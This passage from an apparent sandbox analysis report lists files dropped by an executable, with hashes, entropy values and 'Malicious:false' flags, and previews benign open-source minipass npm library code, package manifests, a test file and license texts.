              Preview:'use strict'.const { Minipass } = require('minipass').const TYPE = Symbol('type').const BUFFER = Symbol('buffer')..class Blob {. constructor (blobParts, options) {. this[TYPE] = ''.. const buffers = []. let size = 0.. if (blobParts) {. const a = blobParts. const length = Number(a.length). for (let i = 0; i < length; i++) {. const element = a[i]. const buffer = element instanceof Buffer ? element. : ArrayBuffer.isView(element). ? Buffer.from(element.buffer, element.byteOffset, element.byteLength). : element instanceof ArrayBuffer ? Buffer.from(element). : element instanceof Blob ? element[BUFFER]. : typeof element === 'string' ? Buffer.from(element). : Buffer.from(String(element)). size += buffer.length. buffers.push(buffer). }. }.. this[BUFFER] = Buffer.concat(buffers, size).. const type = options && options.type !== undefined. && String(options.typ
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):10556
              Entropy (8bit):4.856813792250569
              Encrypted:false
              SSDEEP:
              MD5:D7AC2FF9A571FDA156F28D3C9528F216
              SHA1:B1CE2813C77F7327745DBE9CF4A5FE64166580E5
              SHA-256:3203724DD77014588268B40EAAAB6AF8C5025C51BFF4585CFD2270A263D6F4CE
              SHA-512:A9CB3B2E5004CFE55751AA6F2AE930EE44707AD1B6D89DFA47D8BDB6222ED2AA613FBCA88AB2F39D2099CF8541437D1C0C7DEE45349E17EEA1A8DDB232CD907B
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const { Minipass } = require('minipass').const MinipassSized = require('minipass-sized')..const Blob = require('./blob.js').const { BUFFER } = Blob.const FetchError = require('./fetch-error.js')..// optional dependency on 'encoding'.let convert.try {. convert = require('encoding').convert.} catch (e) {. // defer error until textConverted is called.}..const INTERNALS = Symbol('Body internals').const CONSUME_BODY = Symbol('consumeBody')..class Body {. constructor (bodyArg, options = {}) {. const { size = 0, timeout = 0 } = options. const body = bodyArg === undefined || bodyArg === null ? null. : isURLSearchParams(bodyArg) ? Buffer.from(bodyArg.toString()). : isBlob(bodyArg) ? bodyArg. : Buffer.isBuffer(bodyArg) ? bodyArg. : Object.prototype.toString.call(bodyArg) === '[object ArrayBuffer]'. ? Buffer.from(bodyArg). : ArrayBuffer.isView(bodyArg). ? Buffer.from(bodyArg.buffer, bodyArg.byteOffset, bodyArg.byteLength).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):713
              Entropy (8bit):4.6590232983663435
              Encrypted:false
              SSDEEP:
              MD5:D8976F4A12C427179FDD7821C32E74E4
              SHA1:905009BBA72174EEE2F1044A25B87E3764279900
              SHA-256:0EF76C82E13164DEEDB94685B0E8781136F7E596421F5E29F47854F268630B20
              SHA-512:D9C5C341B967E9DD5E9ACABCCBFAAFD83F65759C320148C9D2C15B48DE324E0283246F32847D0D73DF147BC4BBB943E1ED11F267AD3E9F9B9C8B2D92D1E98490
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.class FetchError extends Error {. constructor (message, type, systemError) {. super(message). this.code = 'FETCH_ERROR'.. // pick up code, expected, path, .... if (systemError) {. Object.assign(this, systemError). }.. this.errno = this.code.. // override anything the system error might've clobbered. this.type = this.code === 'EBADSIZE' && this.found > this.expect. ? 'max-size' : type. this.message = message. Error.captureStackTrace(this, this.constructor). }.. get name () {. return 'FetchError'. }.. // don't allow name to be overwritten. set name (n) {}.. get [Symbol.toStringTag] () {. return 'FetchError'. }.}.module.exports = FetchError.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):6547
              Entropy (8bit):4.725538522829992
              Encrypted:false
              SSDEEP:
              MD5:AF11E5AC2C98D8585216B12CAED7958C
              SHA1:EFD6B92EA6A69A557A6BC845F32178F95F0AFE56
              SHA-256:25A7CC3BB7C6B4A64F1ED839DD08A9CC4172CCB00D5C0A0259CC08ECC6177DC0
              SHA-512:57A299E7957A43E145AA631320AE227FF36A27A926FFD0295CA4E114D83A427522DB00FA9D1A419531328DD0241020466C8157761652A4480493FCBE8ED7C8D0
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const invalidTokenRegex = /[^^_`a-zA-Z\-0-9!#$%&'*+.|~]/.const invalidHeaderCharRegex = /[^\t\x20-\x7e\x80-\xff]/..const validateName = name => {. name = `${name}`. if (invalidTokenRegex.test(name) || name === '') {. throw new TypeError(`${name} is not a legal HTTP header name`). }.}..const validateValue = value => {. value = `${value}`. if (invalidHeaderCharRegex.test(value)) {. throw new TypeError(`${value} is not a legal HTTP header value`). }.}..const find = (map, name) => {. name = name.toLowerCase(). for (const key in map) {. if (key.toLowerCase() === name) {. return key. }. }. return undefined.}..const MAP = Symbol('map').class Headers {. constructor (init = undefined) {. this[MAP] = Object.create(null). if (init instanceof Headers) {. const rawHeaders = init.raw(). const headerNames = Object.keys(rawHeaders). for (const headerName of headerNames) {. for (const value of rawHeaders[headerName]) {. this.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):13205
              Entropy (8bit):4.459247295846877
              Encrypted:false
              SSDEEP:
              MD5:FBCAABFD415F2FE8169284A392D89785
              SHA1:F3A13B0953B42B0941173B9CCEC8163897ACECA9
              SHA-256:263A8FFEF36A6AB92746BFBB984A9565F2F010743D1BB33839533FF0A4CAF85C
              SHA-512:AD368AC62CCFE6BBAF5D7F0EB0F67D07BA95CE872A2CE00B46545C748BA7ABBC3095E919629FAC123AD41CD7078105623C8FDF3887578A80CF31F293331533EE
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const { URL } = require('url').const http = require('http').const https = require('https').const zlib = require('minizlib').const { Minipass } = require('minipass')..const Body = require('./body.js').const { writeToStream, getTotalBytes } = Body.const Response = require('./response.js').const Headers = require('./headers.js').const { createHeadersLenient } = Headers.const Request = require('./request.js').const { getNodeRequestOptions } = Request.const FetchError = require('./fetch-error.js').const AbortError = require('./abort-error.js')..// XXX this should really be split up and unit-ized for easier testing.// and better DRY implementation of data/http request aborting.const fetch = async (url, opts) => {. if (/^data:/.test(url)) {. const request = new Request(url, opts). // delay 1 promise tick so that the consumer can abort right away. return Promise.resolve().then(() => new Promise((resolve, reject) => {. let type, data. try {. const { pathn
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Algol 68 source, ASCII text
              Category:dropped
              Size (bytes):7173
              Entropy (8bit):4.78439127967129
              Encrypted:false
              SSDEEP:
              MD5:A676655096E70E5BDB4CB4DCF8710E2B
              SHA1:73D50385150D85AA1ECCF675E8BF1A03B092C28F
              SHA-256:37D47AD0F3D7F91EC56B4187475D3FA218C1FAD55F79334B17123337FA5B8DA8
              SHA-512:E41EE7861369EE1A26FFCFB07E8294470FE14820EBFDF043B5D7B36A02E32B424436D5474B632987754377256FCBA9D3B96A40D2B3F4CA1538D098DED6D8F18D
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const { URL } = require('url').const { Minipass } = require('minipass').const Headers = require('./headers.js').const { exportNodeCompatibleHeaders } = Headers.const Body = require('./body.js').const { clone, extractContentType, getTotalBytes } = Body..const version = require('../package.json').version.const defaultUserAgent =. `minipass-fetch/${version} (+https://github.com/isaacs/minipass-fetch)`..const INTERNALS = Symbol('Request internals')..const isRequest = input =>. typeof input === 'object' && typeof input[INTERNALS] === 'object'..const isAbortSignal = signal => {. const proto = (. signal. && typeof signal === 'object'. && Object.getPrototypeOf(signal). ). return !!(proto && proto.constructor.name === 'AbortSignal').}..class Request extends Body {. constructor (input, init = {}) {. const parsedURL = isRequest(input) ? new URL(input.url). : input && input.href ? new URL(input.href). : new URL(`${input}`).. if (isRequest(input)) {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1952
              Entropy (8bit):4.767154342741007
              Encrypted:false
              SSDEEP:
              MD5:233EAD6729769887288A200DB6029FA7
              SHA1:B05AE55D74AD33076CFB6DF9698CB4B0C3D5D3FD
              SHA-256:5CA89C930583CA0D3DE066E7B58CA6CD57FD9271A5CA5FF30CD2AE7085D6AC7A
              SHA-512:C14C73BAA9EDA624526CEA34B5D0AA0AA94577E1F52430106AA8D36272E84CF243F720E77C781BFE208F93C9822E6D01E6FDCFD38AC0EBBC86B892ECCE16467B
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const http = require('http').const { STATUS_CODES } = http..const Headers = require('./headers.js').const Body = require('./body.js').const { clone, extractContentType } = Body..const INTERNALS = Symbol('Response internals')..class Response extends Body {. constructor (body = null, opts = {}) {. super(body, opts).. const status = opts.status || 200. const headers = new Headers(opts.headers).. if (body !== null && body !== undefined && !headers.has('Content-Type')) {. const contentType = extractContentType(body). if (contentType) {. headers.append('Content-Type', contentType). }. }.. this[INTERNALS] = {. url: opts.url,. status,. statusText: opts.statusText || STATUS_CODES[status],. headers,. counter: opts.counter,. trailer: Promise.resolve(opts.trailer || new Headers()),. }. }.. get trailer () {. return this[INTERNALS].trailer. }.. get url () {. return this[INTERNALS].url || ''. }.. get st
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1698
              Entropy (8bit):4.746961384047956
              Encrypted:false
              SSDEEP:
              MD5:8ED4926EDB0BC8753FF647D1D8B58ABA
              SHA1:0864351787BE5EB74DE6263A3F2D04087A3AFB4C
              SHA-256:756A53E84961495A5475CD88D0EDC5CB8FD83F377B27A883775897C8B242F895
              SHA-512:04FD9A81CB1DB7ADE04A05E2122825C46CF1AB1DFED16DDCC1D3AC6737926B0295648527A1C51225C9DCCAC1199A1D015ECAB2047D4B9A9CFEA0AE249095D2C2
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "minipass-fetch",. "version": "3.0.4",. "description": "An implementation of window.fetch in Node.js using Minipass streams",. "license": "MIT",. "main": "lib/index.js",. "scripts": {. "test:tls-fixtures": "./test/fixtures/tls/setup.sh",. "test": "tap",. "snap": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "template-oss-apply": "template-oss-apply --force". },. "tap": {. "coverage-map": "map.js",. "check-coverage": true,. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.18.0",. "@ungap/url-search-params": "^0.2.2",. "abort-controller": "^3.0.0",. "abortcontroller-polyfill": "~1.7.3",. "encoding": "^0.1.13",. "form-data": "^4.0.0",. "nock": "^13.2.4",. "parted": "^0.1.1",. "string-to-arraybuffer": "^1.0.2",.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1011
              Entropy (8bit):4.626079402753193
              Encrypted:false
              SSDEEP:
              MD5:1708EE52A31B5270443552F0156EF0FA
              SHA1:C54EE32DACCBC0FD273221E9891B359D137D78C5
              SHA-256:56D0DFBD2ACBAFFD7A592EB25130EED4AB12BC1C10844677B2D869D5992C36A9
              SHA-512:D30A0D278D41E253AF5AA9C84A2AA272089285D383185974D1C3A1CC716FF7F5E906C238F188AA3C3F2056CD4D42D9FA494F1334FEA16BA812CDE4B5FEC4228A
              Malicious:false
              Reputation:unknown
              Preview:const Minipass = require('minipass').const _flush = Symbol('_flush').const _flushed = Symbol('_flushed').const _flushing = Symbol('_flushing').class Flush extends Minipass {. constructor (opt = {}) {. if (typeof opt === 'function'). opt = { flush: opt }.. super(opt).. // or extend this class and provide a 'flush' method in your subclass. if (typeof opt.flush !== 'function' && typeof this.flush !== 'function'). throw new TypeError('must provide flush function in options').. this[_flush] = opt.flush || this.flush. }.. emit (ev, ...data) {. if ((ev !== 'end' && ev !== 'finish') || this[_flushed]). return super.emit(ev, ...data).. if (this[_flushing]). return.. this[_flushing] = true.. const afterFlush = er => {. this[_flushed] = true. er ? super.emit('error', er) : super.emit('end'). }.. const ret = this[_flush](afterFlush). if (ret && ret.then). ret.then(() => afterFlush(), er => afterFlush(er)). }.}..module.expor
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):799
              Entropy (8bit):4.614997768029399
              Encrypted:false
              SSDEEP:
              MD5:BFFF449B26AEFD0CF4CD1661390E92D0
              SHA1:C89612A2A9C68141B8271BBC94BCC88067C29790
              SHA-256:822C46377BE9B8A54B3565210B03F874F65F28C88CCA59168368FD11842219CD
              SHA-512:F5C1997732B07AB6BDE67D1689931E5554E4235D0A5BF54A084F6FDDDE2D39068B981BC5CB870FF8F959A2188E1282F0F508196836E02841AD372DA1E86815C7
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "minipass-flush",. "version": "1.0.5",. "description": "A Minipass stream that calls a flush function before emitting 'end'",. "author": "Isaac Z. Schlueter <i@izs.me> (https://izs.me)",. "license": "ISC",. "scripts": {. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --follow-tags". },. "tap": {. "check-coverage": true. },. "devDependencies": {. "tap": "^14.6.9". },. "dependencies": {. "minipass": "^3.0.0". },. "files": [. "index.js". ],. "main": "index.js",. "repository": {. "type": "git",. "url": "git+https://github.com/isaacs/minipass-flush.git". },. "keywords": [. "minipass",. "flush",. "stream". ],. "engines": {. "node": ">= 8". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1311
              Entropy (8bit):5.13179879120193
              Encrypted:false
              SSDEEP:
              MD5:E4CF79B8D009386E2356B9E4DB67C4CB
              SHA1:0CC717C438DF46CE5B953B6FC6BD4296251D34EB
              SHA-256:E7A7476EDAF198EEF0D0507325D463CD49116D4BAF7EE9926958A83F96B8E476
              SHA-512:803ACDECA4C343E073280A2806A3F7A77AA1C812F88D4DCA0BDD0D32AB80FC07EE2DF6D492D84F93F7F3750F696B434FC61448940EFC1DAE6D8413DFBF6C353D
              Malicious:false
              Reputation:unknown
              Preview:The MIT License..Copyright (c) Isaac Z. Schlueter and Contributors.Copyright (c) 2011 Dominic Tarr..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRAC
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6048
              Entropy (8bit):4.613716221733495
              Encrypted:false
              SSDEEP:
              MD5:ECF182C709147F4E914114AD6A58F09B
              SHA1:D0966F8CCED07A2BB67F40CC4B6373ABE839C043
              SHA-256:A4A62B14D33595333AF65A69D73250BE4DE37EB47A06E3628510597E940A5D95
              SHA-512:19B5EAE07EA256B2FAFA3229612A92BC16B3E42D470F86915789B18C6A2593EE726AD0F3388AA9F4AF88CED4B498E003668EB68323C47DB3479BECEABF22655D
              Malicious:false
              Reputation:unknown
              Preview:// put javascript in here.'use strict'..const Parser = require('jsonparse').const Minipass = require('minipass')..class JSONStreamError extends Error {. constructor (err, caller) {. super(err.message). Error.captureStackTrace(this, caller || this.constructor). }. get name () {. return 'JSONStreamError'. }. set name (n) {}.}..const check = (x, y) =>. typeof x === 'string' ? String(y) === x. : x && typeof x.test === 'function' ? x.test(y). : typeof x === 'boolean' || typeof x === 'object' ? x. : typeof x === 'function' ? x(y). : false..const _parser = Symbol('_parser').const _onValue = Symbol('_onValue').const _onTokenOriginal = Symbol('_onTokenOriginal').const _onToken = Symbol('_onToken').const _onError = Symbol('_onError').const _count = Symbol('_count').const _path = Symbol('_path').const _map = Symbol('_map').const _root = Symbol('_root').const _header = Symbol('_header').const _footer = Symbol('_footer').const _setHeaderFooter = Symbol('_setHeaderFooter').const _
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):16631
              Entropy (8bit):4.895871223084351
              Encrypted:false
              SSDEEP:
              MD5:A8C344AC3D111B646DF0DCAE1F2BC3A3
              SHA1:D8A136B49214E498DA9C5A6E8CB9681B4FDA3149
              SHA-256:DBC5220C4BC8B470DA9C8E561B6A5382CF3FA9DCD97CACE955AC6FD34A27970C
              SHA-512:523749E4D38585249F1E3D7CFB2CB23E7F76764B36D0A628F48FF6B50F0A08C8E8526A1236977DA1BD4AC0FF0BD8D0BA9B834324F2BDEF9BEA9394DD6878C51D
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const proc = typeof process === 'object' && process ? process : {. stdout: null,. stderr: null,.}.const EE = require('events').const Stream = require('stream').const SD = require('string_decoder').StringDecoder..const EOF = Symbol('EOF').const MAYBE_EMIT_END = Symbol('maybeEmitEnd').const EMITTED_END = Symbol('emittedEnd').const EMITTING_END = Symbol('emittingEnd').const EMITTED_ERROR = Symbol('emittedError').const CLOSED = Symbol('closed').const READ = Symbol('read').const FLUSH = Symbol('flush').const FLUSHCHUNK = Symbol('flushChunk').const ENCODING = Symbol('encoding').const DECODER = Symbol('decoder').const FLOWING = Symbol('flowing').const PAUSED = Symbol('paused').const RESUME = Symbol('resume').const BUFFERLENGTH = Symbol('bufferLength').const BUFFERPUSH = Symbol('bufferPush').const BUFFERSHIFT = Symbol('bufferShift').const OBJECTMODE = Symbol('objectMode').const DESTROYED = Symbol('destroyed').const EMITDATA = Symbol('emitData').const EMITEND = Symbol('emitEnd').
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):808
              Entropy (8bit):4.658253484888306
              Encrypted:false
              SSDEEP:
              MD5:8AF1421EE9144006E68A6E0D2416A34C
              SHA1:C8F7BEDA672238B058D197EBF254CAA9FCA12A8B
              SHA-256:884C5799BD4158B7147F51CA4318D00D6265BBECA19D64B519F178CAADDDB26F
              SHA-512:F7ED1BED6D749139EC94686CFB43C0FC5A8AB8EFCFA1ECDD19D342A65FADD7763A88A7D2279C2F08B5603D5342574D5D46EFA1FB8D797E3E40AC0C052D60622F
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "minipass-json-stream",. "version": "1.0.1",. "description": "Like JSONStream, but using Minipass streams",. "author": "Isaac Z. Schlueter <i@izs.me> (https://izs.me)",. "license": "MIT",. "scripts": {. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --follow-tags". },. "tap": {. "check-coverage": true. },. "devDependencies": {. "JSONStream": "^1.3.5",. "tap": "^14.6.9". },. "dependencies": {. "jsonparse": "^1.3.1",. "minipass": "^3.0.0". },. "repository": {. "type": "git",. "url": "git+https://github.com/npm/minipass-json-stream.git". },. "keywords": [. "stream",. "json",. "parse",. "minipass",. "JSONStream". ],. "files": [. "index.js". ].}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3412
              Entropy (8bit):4.7069023320073375
              Encrypted:false
              SSDEEP:
              MD5:5E8649B943EF1575403FB9DC48654040
              SHA1:1BBA1CA8D69C95E94B20BA1F85E9752ECFE2AC59
              SHA-256:3DEADCD27F94BA4EBFF5AFFCAAAA5241EF441444E9169D6C37AC069C6B008CF1
              SHA-512:51904CD8CB4D8235FF536BC8B83D66AA15F6D40940C15F03284834EE9C9B5E4707B02524191412378ECCC2ADB632711D70828C96FFB215683465B742835FCC62
              Malicious:false
              Reputation:unknown
              Preview:const Minipass = require('minipass').const EE = require('events').const isStream = s => s && s instanceof EE && (. typeof s.pipe === 'function' || // readable. (typeof s.write === 'function' && typeof s.end === 'function') // writable.)..const _head = Symbol('_head').const _tail = Symbol('_tail').const _linkStreams = Symbol('_linkStreams').const _setHead = Symbol('_setHead').const _setTail = Symbol('_setTail').const _onError = Symbol('_onError').const _onData = Symbol('_onData').const _onEnd = Symbol('_onEnd').const _onDrain = Symbol('_onDrain').const _streams = Symbol('_streams').class Pipeline extends Minipass {. constructor (opts, ...streams) {. if (isStream(opts)) {. streams.unshift(opts). opts = {}. }.. super(opts). this[_streams] = []. if (streams.length). this.push(...streams). }.. [_linkStreams] (streams) {. // reduce takes (left,right), and we return right to make it the. // new left value.. return streams.reduce((src, dest) => {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):588
              Entropy (8bit):4.553209880178634
              Encrypted:false
              SSDEEP:
              MD5:C3249906DED53EA7C8B05FA9BD0C2DE5
              SHA1:E30C58465801DEACEB4B81898E531C75679563B1
              SHA-256:C20F059CA6012AF5A3D255948C7AB1FCCC06AD1D0019C669B08BA251CD4B281D
              SHA-512:186A2CE0A2557FFE473917A3C4177667889D690EE297520792B40E9FADF00F85AFC2B6A630603789CC8472B344F9A625A59FA1095C5D5E5C07F3076DC37D8B8F
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "minipass-pipeline",. "version": "1.2.4",. "description": "create a pipeline of streams using Minipass",. "author": "Isaac Z. Schlueter <i@izs.me> (https://izs.me)",. "license": "ISC",. "scripts": {. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --follow-tags". },. "tap": {. "check-coverage": true. },. "devDependencies": {. "tap": "^14.6.9". },. "dependencies": {. "minipass": "^3.0.0". },. "files": [. "index.js". ],. "engines": {. "node": ">=8". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1785
              Entropy (8bit):4.69640624234378
              Encrypted:false
              SSDEEP:
              MD5:1DC66C2E43938E368EF59C50C9F3F88D
              SHA1:F5B517585BE59D70CA2CDEB4ECC35D950BC1423D
              SHA-256:21C8904D1CE6960362BC6AA7261E3B371B8F203B60FCC57E1B54A701E96EC77D
              SHA-512:14F486288D1BEAD1E42057A31E0B8A7632A4052C49E0F888200BA9AB2D4491BFF3177B24450F6C0EF1D2A305A9865A22ADDEF0089DE863D8A9CFB76652541989
              Malicious:false
              Reputation:unknown
              Preview:const Minipass = require('minipass')..class SizeError extends Error {. constructor (found, expect) {. super(`Bad data size: expected ${expect} bytes, but got ${found}`). this.expect = expect. this.found = found. this.code = 'EBADSIZE'.. Error.captureStackTrace(this, this.constructor). }. get name () {. return 'SizeError'. }.}..class MinipassSized extends Minipass {. constructor (options = {}) {. super(options).. if (options.objectMode). throw new TypeError(`${. this.constructor.name. } streams only work with string and buffer data`).. this.found = 0. this.expect = options.size. if (typeof this.expect !== 'number' ||. this.expect > Number.MAX_SAFE_INTEGER ||. isNaN(this.expect) ||. this.expect < 0 ||. !isFinite(this.expect) ||. this.expect !== Math.floor(this.expect)). throw new Error('invalid expected size: ' + this.expect). }.. write (chunk, encoding, cb) {. const buffer = Buffer.isBuffer
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1187
              Entropy (8bit):4.6749165874239855
              Encrypted:false
              SSDEEP:
              MD5:1943A368B7D61CC3792A307EC725C808
              SHA1:FC79B496665E2CDFC4BDAAC9C7D7C4B2F4645F2C
              SHA-256:E99F6B67BA6E5CDA438EFB7A23DD399EE5C2070AF69CE77720D95DE5FB42921E
              SHA-512:7C05F03F5D3DB01798C56C50D21628FC677097630AACF92E9EA47E70FF872D0E4E40217C1C2D5E81FC833CCF5AFE9697F8F20A4772459B396AA5C85263289223
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "minipass",. "version": "3.3.6",. "description": "minimal implementation of a PassThrough stream",. "main": "index.js",. "types": "index.d.ts",. "dependencies": {. "yallist": "^4.0.0". },. "devDependencies": {. "@types/node": "^17.0.41",. "end-of-stream": "^1.4.0",. "prettier": "^2.6.2",. "tap": "^16.2.0",. "through2": "^2.0.3",. "ts-node": "^10.8.1",. "typescript": "^4.7.3". },. "scripts": {. "test": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --follow-tags". },. "repository": {. "type": "git",. "url": "git+https://github.com/isaacs/minipass.git". },. "keywords": [. "passthrough",. "stream". ],. "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)",. "license": "ISC",. "files": [. "index.d.ts",. "index.js". ],. "tap": {. "check-coverage": true. },. "engines": {. "node": ">=8". },. "prettier": {. "semi": false,. "printWidth
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):831
              Entropy (8bit):4.562478424652629
              Encrypted:false
              SSDEEP:
              MD5:FF0DFA068D271772DFBE0AACAF5C9C40
              SHA1:615E0E93DFDBC65B217029380591ABC9E9B64136
              SHA-256:55B337582C4192528F19EEA2ABABF77B18FE2ADA15F346B25A2C1D276FEC182B
              SHA-512:71135276B58A4482F64615EFD577550F9B20F25F0D88063A119F2A2B42757806C318F424CC6FFBF1703193342B8971C046EB982FAED43EC907E36233892A82F9
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "minipass-sized",. "version": "1.0.3",. "description": "A Minipass stream that raises an error if you get a different number of bytes than expected",. "author": "Isaac Z. Schlueter <i@izs.me> (https://izs.me)",. "license": "ISC",. "scripts": {. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --follow-tags". },. "tap": {. "check-coverage": true. },. "devDependencies": {. "tap": "^14.6.4". },. "dependencies": {. "minipass": "^3.0.0". },. "main": "index.js",. "keywords": [. "minipass",. "size",. "length". ],. "directories": {. "test": "test". },. "repository": {. "type": "git",. "url": "git+https://github.com/isaacs/minipass-sized.git". },. "engines": {. "node": ">=8". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2259
              Entropy (8bit):4.878346805608485
              Encrypted:false
              SSDEEP:
              MD5:5C0AF4D22147209BCA675C35A8EDA7F8
              SHA1:9ADC9945C8BE435711767423911FD0409CDC3590
              SHA-256:0DBB5775907943F43DEE34E95B0850C209B1A2DF3EE912B888F1B4EEEC63CFF8
              SHA-512:430023217AD7843658108833E70A1F6E5BC5BF76E5EE1AAD2241D3AB5900BF77D0A10B706937E284D3D0476020F1D9153BD8198CDB011ACCCF0B3885004EACE8
              Malicious:false
              Reputation:unknown
              Preview:const t = require('tap').const MPS = require('../')..t.test('ok if size checks out', t => {. const mps = new MPS({ size: 4 }).. mps.write(Buffer.from('a').toString('hex'), 'hex'). mps.write(Buffer.from('sd')). mps.end('f'). return mps.concat().then(data => t.equal(data.toString(), 'asdf')).})..t.test('error if size exceeded', t => {. const mps = new MPS({ size: 1 }). mps.on('error', er => {. t.match(er, {. message: 'Bad data size: expected 1 bytes, but got 4',. found: 4,. expect: 1,. code: 'EBADSIZE',. name: 'SizeError',. }). t.end(). }). mps.write('asdf').})..t.test('error if size is not met', t => {. const mps = new MPS({ size: 999 }). t.throws(() => mps.end(), {. message: 'Bad data size: expected 999 bytes, but got 0',. found: 0,. name: 'SizeError',. expect: 999,. code: 'EBADSIZE',. }). t.end().})..t.test('error if non-string/buffer is written', t => {. const mps = new MPS({size:1}). mps.on('error', er => {. t.match(
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):787
              Entropy (8bit):5.066711225252366
              Encrypted:false
              SSDEEP:
              MD5:5F114AC709A085D123E16C1E6363793F
              SHA1:185C2AB72F55BF0A69F28B19AC3849C0CA0D9705
              SHA-256:833FAA18AC4B83A6372C05B3643D0D44ECD27D6627B8CD19B0F48FE74260CF39
              SHA-512:CAB00A78E63DEC76FA124FC49D1C28962D674FA18DDA5FDF2819078BD932F1BF0CC9ABD741B78F62869B4809473099F85BA8A622BC96F4EE92CF11B564346597
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) 2017-2023 npm, Inc., Isaac Z. Schlueter, and Contributors..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):33736
              Entropy (8bit):4.550667637930074
              Encrypted:false
              SSDEEP:
              MD5:937A19E43ACB8C168B21FFFF67187790
              SHA1:8C97E12AD9EB6513AD240EF6340FF6880FAFD205
              SHA-256:16EF9FF378BADFB158137BA9B34539E9F05CA1E8BA8F65A02D8B4E7D93003C7F
              SHA-512:FBEC5034502471BE4319DEB23DAD7639AD8732A3D63069B24D4DA1C3F8225438D2C7524275AA2ACC8EFF1375DD032684E38F46FC868C6696E09333E8B9782F9C
              Malicious:false
              Reputation:unknown
